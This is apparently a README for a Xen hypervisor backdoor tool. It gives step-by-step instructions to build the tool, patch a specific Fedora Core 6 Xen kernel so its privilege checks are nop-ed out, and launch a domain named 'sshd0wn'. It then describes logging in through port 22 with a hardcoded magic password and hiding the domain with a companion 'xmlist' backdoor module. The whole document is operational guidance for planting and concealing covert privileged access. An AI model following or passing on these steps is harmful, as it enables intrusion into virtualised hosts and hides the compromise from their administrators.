1) check the file linux-x.x.x/arch/i386/kernel/entry.S in the sources of the
vanilla kernel of the version matching your dom0 kernel. At its beginning
there is the registers layout; compare it with "uregs.h" file, the "fs"
register may need to be uncommented
2) build the stub kernel module in "offsets" directory
3) make (as root); one needs the libxenctrl static library and includes; if 
-lpthread is required by your libxenctrl.a, add it in Makefile
4) verify that kallsyms.c contents is sane, if not, correct manually, make
5) obtain vmlinuz-2.6.18-1.2798.fc6xen kernel image (ships with Fedora Core
6, in kernel-xen-2.6.18-1.2798.fc6 rpm). The reason why one has to use this
particular kernel is that two calls to is_initial_xendomain() must be
nop-ed out, and the patch_check() function in init.c knows only the offsets
for this particular kernel image. If you use other kernel image, you must
modify offsets in init.c properly
6) xm create -c  /dev/null ramdisk=initrd \
	kernel=vmlinuz-2.6.18-1.2798.fc6xen \
	name=sshd0wn vcpus=1 memory=32 root=/dev/ram0
7) telnet dom0 22, enter the magic password (hardcoded in foreign.c,
currently "iddqd") without ending with newline, press ctrl-d, wait 2
seconds, press return, enjoy.
8) you may use "xmlist" xen backdoor module to hide sshd0wn domain 
